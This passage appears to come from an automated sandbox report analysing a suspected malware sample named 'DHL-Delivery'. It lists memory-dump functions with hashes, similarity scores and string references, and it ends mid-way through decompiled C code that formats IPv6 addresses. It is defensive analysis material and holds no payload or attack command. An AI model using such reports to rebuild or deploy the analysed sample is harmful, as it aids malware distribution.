                        • Opcode ID: 402b0db1665bad1e4e263ce440c5ee23acb4e273b7b488784b98185c1e923400
                        • Instruction ID: 54acc04f4cf8a1b2026ab8be3ce49115233b82df99c484314ac79615e75c68d8
                        • Opcode Fuzzy Hash: 402b0db1665bad1e4e263ce440c5ee23acb4e273b7b488784b98185c1e923400
                        • Instruction Fuzzy Hash: 7D91E176E0065A8BCB10CF59C980AEEB7F1FF48710F6542A9E904E7350D3B59E91CB90
                        Uniqueness

                        Uniqueness Score: 3.53%

                        Function 1E0F2D70, Relevance: 6.1, Strings: 3, Instructions: 2382UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: bc36f76bf374192c166a2a1f7ba8c5d59db63d1d1c576cdfbfe21ccb77017a4c
                        • Instruction ID: 8b7579638b1293a0d3a35582f5e960ae3443c4d97bbf71d9985566e2d2695e84
                        • Opcode Fuzzy Hash: bc36f76bf374192c166a2a1f7ba8c5d59db63d1d1c576cdfbfe21ccb77017a4c
                        • Instruction Fuzzy Hash: 5923B170A00255DFDB14CF69C490BADBBF2FF49714F2482A9D849AB385D734A992CF50
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E107F61, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136timeUNIQUE
                        Download Yara Rule
                        APIs
                        Strings
                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E108062
                        • kLsE, xrefs: 1E1080DC
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                        • API String ID: 3446177414-2547482624
                        • Opcode ID: 252048135f95ae084fcc256f0ca277ef0d2069e111372fbe7f86580ad5a58a16
                        • Instruction ID: edc2b9cd51b2fe372e83d53cf9c823499317c63d217f43957c8be275851c8174
                        • Opcode Fuzzy Hash: 252048135f95ae084fcc256f0ca277ef0d2069e111372fbe7f86580ad5a58a16
                        • Instruction Fuzzy Hash: 5E51C076A04786DFD714DFA5C9806EBF7F5AF44300F204A3ED9A987204D770AA85CBA1
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E0F0C60, Relevance: 5.4, Strings: 4, Instructions: 355UNIQUE
                        Download Yara Rule
                        Strings
                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 1E140FF4
                        • SsHd, xrefs: 1E0F0CA5
                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 1E140FA1
                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 1E140FD7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                        • API String ID: 0-2905229100
                        • Opcode ID: 5ebaf4070cd2eeec7eef04fe7b473c6754bc590e422d7c88a8c3bf504d650ea9
                        • Instruction ID: 6691d3df066608e7933797696bbdf417821cb320dd33ef92cc95edfa207c8479
                        • Opcode Fuzzy Hash: 5ebaf4070cd2eeec7eef04fe7b473c6754bc590e422d7c88a8c3bf504d650ea9
                        • Instruction Fuzzy Hash: 47D1B175A0021ADFCB15CF99C8E06EDB7F6FF48310F24426AE845AB345D731A8A1CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E1ABF8A, Relevance: 4.6, APIs: 3, Instructions: 87timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: ade935a2a0c4574093e326549f0bcf559b6d7b339ef869e404d118f4e9d23ebf
                        • Instruction ID: b4afc951cee52c6142e92816ce312cb0013866445fc7edc224a2f84488fcf9bb
                        • Opcode Fuzzy Hash: ade935a2a0c4574093e326549f0bcf559b6d7b339ef869e404d118f4e9d23ebf
                        • Instruction Fuzzy Hash: 20316779B01159AFCB18CFA5C994EAFBBB9FF8C214F554269E905E7200DB306D44CBA0
                        Uniqueness

                        Uniqueness Score: 0.70%

                        Function 1E105E34, Relevance: 4.3, Strings: 3, Instructions: 523UNIQUE
                        Download Yara Rule
                        Strings
                        • HEAP: , xrefs: 1E14B1DF
                        • HEAP[%wZ]: , xrefs: 1E14B1D2
                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1E14B1F4
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: 49853834dee3cef1dc1bb94e216d6f26761f461f1a1a3a939bd7160d33f7b3ab
                        • Instruction ID: 878079a3d2c5a1cd3d0943b157ec4247727dabbf3cfd74cdedf495b6913d45c4
                        • Opcode Fuzzy Hash: 49853834dee3cef1dc1bb94e216d6f26761f461f1a1a3a939bd7160d33f7b3ab
                        • Instruction Fuzzy Hash: 5C12EE34600296EFDB14CF26C590BAAB7A2BF45304F358A5DE4868B785D735F9C1CB90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E105CF9, Relevance: 3.9, Strings: 3, Instructions: 154COMMON
                        Download Yara Rule
                        Strings
                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1E14B0E1
                        • HEAP: , xrefs: 1E14B0D6
                        • HEAP[%wZ]: , xrefs: 1E14B0C9
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                        • API String ID: 0-1596344177
                        • Opcode ID: b3a79a006c7d1fc22d7696e1f01aeec83ae11de431a17fa0150836ff6bea0889
                        • Instruction ID: 3e15247724a1731e884b542d73df89fd065f6ab935fd8a76366a773225f1e2f2
                        • Opcode Fuzzy Hash: b3a79a006c7d1fc22d7696e1f01aeec83ae11de431a17fa0150836ff6bea0889
                        • Instruction Fuzzy Hash: DE51DF35A10655EFDB24CF59C998AADB7B2FF44310F258299D4059B386C731FD82CB90
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Function 1E0E9E39, Relevance: 2.7, Strings: 2, Instructions: 239UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: (0u$\@u
                        • API String ID: 0-3465995676
                        • Opcode ID: e099dd0612817eb010a3b235f25ef5518a2ff1e3afa174ebca50f157f11f3bd0
                        • Instruction ID: 910984814cfbd9294aa8368200ccbfc63b687febd04d749f630efbd18d5b9146
                        • Opcode Fuzzy Hash: e099dd0612817eb010a3b235f25ef5518a2ff1e3afa174ebca50f157f11f3bd0
                        • Instruction Fuzzy Hash: B091AE747043418FD708CE25C494B6BB7E6BF88354F188ABDE886C7A45DB36E885CB51
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E0F4EC0, Relevance: 1.9, Strings: 1, Instructions: 665COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: d
                        • API String ID: 0-2564639436
                        • Opcode ID: 706efad01958ab504e84671cb3bd1137f3c0ce6e6dc3eed5f3bba60b82790ef2
                        • Instruction ID: 84eb684005ab0ad15985c3ac0735b0323aa4180b7b46579c7c899e593a7093e4
                        • Opcode Fuzzy Hash: 706efad01958ab504e84671cb3bd1137f3c0ce6e6dc3eed5f3bba60b82790ef2
                        • Instruction Fuzzy Hash: 1A42BF74604242CFD718CF19C490B2AB7E2BF88714F258B6DE9969B385DB31EC95CB81
                        Uniqueness

                        Uniqueness Score: 0.57%

                        Function 1E174EA5, Relevance: .6, Instructions: 626COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2faa2b7da7fe16f288c4a33ae43a4b232e55ac875f8aa89c236bc3c9c34266f9
                        • Instruction ID: a0b61fa18f1a5b321b48e1b2f8be3502a9ce7f6bada98a7a83e77b1a8a8ebcd0
                        • Opcode Fuzzy Hash: 2faa2b7da7fe16f288c4a33ae43a4b232e55ac875f8aa89c236bc3c9c34266f9
                        • Instruction Fuzzy Hash: 27428D75E102598FEB24CF69C981BADB7F6BF48701F158299E849EB241D734AD80CF50
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E100FE0, Relevance: .4, Instructions: 420COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 036e8161130d0fefd995873b6a1b1d34485160840a530de0136f7e6eea086673
                        • Instruction ID: 4aee744ef117c8fc4cab59422ac1cf7b4e8d97b722a439f8f6d596a1c0cdd08f
                        • Opcode Fuzzy Hash: 036e8161130d0fefd995873b6a1b1d34485160840a530de0136f7e6eea086673
                        • Instruction Fuzzy Hash: F5F1F174B083829FD715CB29C54475A77E7AB85724F298B2DE895CB384D739E8C0CB82
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E133F53, Relevance: .2, Instructions: 243COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ca0f295d4c1e618545d8ad280ae2e1a55f2046a97335b2bcd28bf38b11193ad
                        • Instruction ID: 653129072b73f5313612c988cf3c1d2035d250dfd602c2c25f9c479078e5013f
                        • Opcode Fuzzy Hash: 6ca0f295d4c1e618545d8ad280ae2e1a55f2046a97335b2bcd28bf38b11193ad
                        • Instruction Fuzzy Hash: 6B91E479B0064A9BDB04CF25C9907BE77E2AF44321F358A29E855DB381D774ED81CB50
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E0F6E00, Relevance: .2, Instructions: 242COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3e142fc30ace161229ec39ebace02ea138c62f2bc87e93c3e8b31362eefed5e
                        • Instruction ID: 3b1aaa3999b97e9b7fa63efcc3d3f87ccb3175892677978ba56680fac4013ac9
                        • Opcode Fuzzy Hash: c3e142fc30ace161229ec39ebace02ea138c62f2bc87e93c3e8b31362eefed5e
                        • Instruction Fuzzy Hash: 3981D43170025ADBDB10CE69DCA0BAEB7F2FB84340F604669E895EB345D730E965CB90
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1A5C94, Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aca8b9396f3a6bd8baa42c355b5b17ed5efbd3fbe72e6a1e82f752fb4118b2d3
                        • Instruction ID: f9613bfc0bede34cc54807347b13408bb66c35c8b2e5867217e723d4c08bf9fb
                        • Opcode Fuzzy Hash: aca8b9396f3a6bd8baa42c355b5b17ed5efbd3fbe72e6a1e82f752fb4118b2d3
                        • Instruction Fuzzy Hash: 2561F779E042A99BCB18CF69C4909BEB7F2EFC8310F114669E945EB344DB34D981CB90
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1A6E72, Relevance: .2, Instructions: 200COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53946e3dfe1bf182637f161a5b6b4d06744b1e162109c405b0b7dfe6140b2bbc
                        • Instruction ID: e434ecafb9054063579aef42d761741b35c70e8f40ef48a2936baa52ca4961fb
                        • Opcode Fuzzy Hash: 53946e3dfe1bf182637f161a5b6b4d06744b1e162109c405b0b7dfe6140b2bbc
                        • Instruction Fuzzy Hash: 2F715079A00259DFCF04CFA8C990AAEB7B6FFC4310F158669D916AB344D734EA85CB50
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1A5FEC, Relevance: .2, Instructions: 164COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a317e34313dbd24dae12d9cdec4e1789546a5096f70bdf16a93c790ee750685
                        • Instruction ID: 9a8b31559b252b1e9afdaa897c7bdc83c6b2eb6aed09b83da6c791b91882784a
                        • Opcode Fuzzy Hash: 2a317e34313dbd24dae12d9cdec4e1789546a5096f70bdf16a93c790ee750685
                        • Instruction Fuzzy Hash: 05519F39E1065A9BCB08CF69C8806EDBBF2FF98310B14822AD515E7354E734E655CB90
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E11FEE0, Relevance: .2, Instructions: 160COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: adf7ec833217c136ee70b935c3683bfe9d9ecb06da29173a38f93af962669f9d
                        • Instruction ID: c72504caa1fd58d1210601f4c10409dc3d0d3fb9fa50d79dbab2722736c13dab
                        • Opcode Fuzzy Hash: adf7ec833217c136ee70b935c3683bfe9d9ecb06da29173a38f93af962669f9d
                        • Instruction Fuzzy Hash: 1451F174600256DFCB04CF6AC590BAEB7B6FF46700F60436AE955DB780EB719890CBA0
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E162C00, Relevance: .2, Instructions: 156COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 733cb7adb3c2717ff05e58023a9aa749da05b50b2cb5c7cd2e7cda009851a794
                        • Instruction ID: 665adfa0d44068ca112a09b82e2d244ae799dd7eb162171be2f4ef409a03537b
                        • Opcode Fuzzy Hash: 733cb7adb3c2717ff05e58023a9aa749da05b50b2cb5c7cd2e7cda009851a794
                        • Instruction Fuzzy Hash: 7B411575B052805AD704DFB98D85ADF76D2BB8C750F08872EE816E7344CBB4ACE18691
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E189F0E, Relevance: .1, Instructions: 136COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53917c0f6d71c6ba464777d0ec9bc7fd49bde6017a9972b83637191c919c8d02
                        • Instruction ID: 73afba82ad76ed1c99d3d167fcf8e590d7383e6c37d9f47d1c271f04a6b839f0
                        • Opcode Fuzzy Hash: 53917c0f6d71c6ba464777d0ec9bc7fd49bde6017a9972b83637191c919c8d02
                        • Instruction Fuzzy Hash: 584128316042969FDB08CF29C451AFABBE2FF49300F14865AE9C58B346D731E8A5DF60
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1A4E23, Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fcbe7f1c49234a4243224c274f865fd8020a958d781c47b9961144709b26a47
                        • Instruction ID: 7d9c9a06b624b30cd7573e1cf6e5fe0402c9df510e7c3283824159ebc45458a4
                        • Opcode Fuzzy Hash: 7fcbe7f1c49234a4243224c274f865fd8020a958d781c47b9961144709b26a47
                        • Instruction Fuzzy Hash: BF319E316002449FCB14CF69D9C4A97BFE5FF88310F5185A9E908DF249E370E995CBA0
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1ABD33, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1f4e5285efbf2afa9335e721178dfe3da75de060cf58008ef22da83444de854
                        • Instruction ID: c340d41f54997bd8dfc2272648a83cdac044c3c335cfd9c05e1064a26d919c3e
                        • Opcode Fuzzy Hash: f1f4e5285efbf2afa9335e721178dfe3da75de060cf58008ef22da83444de854
                        • Instruction Fuzzy Hash: E821D5656045990FD718DF2B88F09B6BFE5FFC612239581F6D985EF242C12C9846CBB0
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E1AAFDF, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8b7e2cc5a056615503bd4c1c3f5a5a7c13a3dff8b4faa617faac01542441fdf
                        • Instruction ID: c83813d3e5c8c81dd29cc6d583af7c0fb246c39a01f0bd702e780bbfc157c4a9
                        • Opcode Fuzzy Hash: e8b7e2cc5a056615503bd4c1c3f5a5a7c13a3dff8b4faa617faac01542441fdf
                        • Instruction Fuzzy Hash: 2721A533A105259FD728CF7DC80446AFBE6FFCC21471A467AD916DB264E670BD51C680
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E0E7D76, Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e40aac978f46cfc4cc8e51a03a90c155a8d0d5278a8b7b0a0f37be543cfa4529
                        • Instruction ID: f75e4ecc4bede79b2bc23427d66226f84e693607d9a2bd8a8dc808156ac32d6f
                        • Opcode Fuzzy Hash: e40aac978f46cfc4cc8e51a03a90c155a8d0d5278a8b7b0a0f37be543cfa4529
                        • Instruction Fuzzy Hash: 78217276E00119DBCB14CFA9C58068AF3F9FB88360FA64265EA58B7744C630AE45CBD0
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 1E11BF00, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 198COMMON
                        Download Yara Rule
                        C-Code - Quality: 38%
                        			E1E11BF00(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t67;
				signed int _t72;
				signed int _t78;
				signed int _t91;
				signed int _t95;
				signed int _t100;
				signed int _t102;
				intOrPtr _t108;
				signed int _t109;
				intOrPtr _t110;
				signed int _t111;
				signed char _t118;
				void* _t119;
				signed int _t122;
				intOrPtr _t123;
				signed char _t125;
				intOrPtr* _t126;
				signed int _t127;
				void* _t128;
				void* _t136;

				_t108 = _a8;
				_t126 = _a4;
				_t127 = 0;
				_v24 = 8;
				_v16 = _t108 + 0x5c;
				if( *_t126 == 0) {
					if( *((intOrPtr*)(_t126 + 2)) != 0 ||  *((intOrPtr*)(_t126 + 4)) != 0 ||  *((intOrPtr*)(_t126 + 6)) != 0) {
						goto L1;
					} else {
						_t125 =  *(_t126 + 0xc) & 0x0000ffff;
						_t118 = _t125 >> 8;
						_v20 = _t118;
						if(_t125 == 0) {
							goto L1;
						}
						_t95 =  *(_t126 + 8) & 0x0000ffff;
						if(_t95 != 0) {
							_v20 = 0xffff;
							if(_t95 != _v20 ||  *(_t126 + 0xa) != 0) {
								goto L1;
							} else {
								_push( *(_t126 + 0xf) & 0x000000ff);
								_push( *(_t126 + 0xe) & 0x000000ff);
								_push(_t118 & 0x000000ff);
								_t100 = E1E12DED0(_t108, 0x2e, L"::ffff:0:%u.%u.%u.%u", _t125 & 0x000000ff);
								L33:
								return _t108 + _t100 * 2;
							}
						}
						_t102 =  *(_t126 + 0xa) & 0x0000ffff;
						if(_t102 == 0) {
							_t119 = 0x1e0b4e94;
							L31:
							_push( *(_t126 + 0xf) & 0x000000ff);
							_push( *(_t126 + 0xe) & 0x000000ff);
							_push(_v20 & 0x000000ff);
							_push(_t125 & 0x000000ff);
							_t100 = E1E12DED0(_t108, 0x2e, L"::%hs%u.%u.%u.%u", _t119);
							goto L33;
						}
						if(_t102 != 0xffff) {
							goto L1;
						}
						_t119 = "ffff:";
						goto L31;
					}
				}
				L1:
				_t111 = _t127;
				_t67 = _t127;
				_v8 = _t111;
				_v20 = _t67;
				if(( *(_t126 + 8) & 0x0000fffd) == 0 &&  *(_t126 + 0xa) == 0xfe5e) {
					_v24 = 6;
				}
				_t122 = _t127;
				_t109 = _t67;
				do {
					if( *((intOrPtr*)(_t126 + _t122 * 2)) != _t127) {
						_t33 = _t122 + 1; // 0x1
						_t67 = _t33;
						_v20 = _t67;
					} else {
						_t136 = _t122 - _t67 + 1 - _v8 - _t109;
						_t67 = _v20;
						if(_t136 <= 0) {
							_t111 = _v8;
						} else {
							_t16 = _t122 + 1; // 0x1
							_t111 = _t16;
